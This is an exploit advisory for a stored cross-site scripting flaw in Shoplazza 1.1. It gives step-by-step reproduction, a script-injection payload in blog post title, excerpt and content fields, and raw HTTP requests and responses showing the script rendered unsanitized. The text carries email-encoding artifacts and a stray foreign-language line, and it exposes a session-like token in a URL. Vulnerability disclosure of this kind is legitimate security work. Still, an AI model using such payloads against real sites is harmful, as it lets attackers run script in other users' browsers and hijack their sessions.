# Exploit Title: Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) # Exploit Author: Andrey Stoykov # Software Link: https://github.com/Shoplazza/LifeStyle # Version: 1.1 # Tested on: Ubuntu 20.04 Stored XSS #1: To reproduce do the following: 1. Login as normal user account 2. Browse "Blog Posts" -> "Manage Blogs" -> "Add Blog Post" 3. Select "Title" and enter payload "><script>alert(1)</script> // HTTP POST request showing XSS payload PATCH /admin/api/admin/articles/2dc688b1-ac9e-46d7-8e56-57ded1d45bf5 HTTP/1= .1 Host: test1205.myshoplaza.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] {"article":{"id":"2dc688b1-ac9e-46d7-8e56-57ded1d45bf5","title":"Title\"><s= cript>alert(1)</script>","excerpt":"Excerpt\"><script>alert(2)</script>","c= ontent":"<p>\"><script>alert(3)</script></p>"[...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: application/json; charset=3Dutf-8 [...] {"article":{"title":"Title\"><script>alert(1)</script>","excerpt":"Excerpt\= "><script>alert(2)</script>","published":true,"seo_title":"Title\"><script>= alert(1)</script>"[...] // HTTP GET request to trigger XSS payload GET /blog/titlescriptalert1script?st=3DeyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9= .eyJleHAiOjE2NzAzMzE5MzYsInN0b3JlX2lkIjo1MTA0NTksInVzZXJfaWQiOiI4NGY4Nzk4ZC= 03ZGQ1LTRlZGMtYjk3Yy02MWUwODk5ZjM2MDgifQ.9ybPJCtv6Lzf1BlDy-ipoGpXajtl75QdUK= Enfj9L49I HTTP/1.1 Host: test1205.myshoplaza.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100= 101 Firefox/100.0 [...] // HTTP response showing unsanitized XSS payload HTTP/1.1 200 OK Content-Type: text/html; charset=3DUTF-8 [...] <meta name=3D"viewport" content=3D"width=3Ddevice-width,initial-scale=3D1,m= inimum-scale=3D1,maximum-scale=3D1,user-scalable=3Dno,viewport-fit=3Dcover"= > <title>Title"><script>alert(1)</script></title> <meta name=3D"keywords" content=3D"test1205"> [...] --rehcsed-054bdeb7-e1dc-47b8-a8d3-67ca7da532d2--
体验盒子
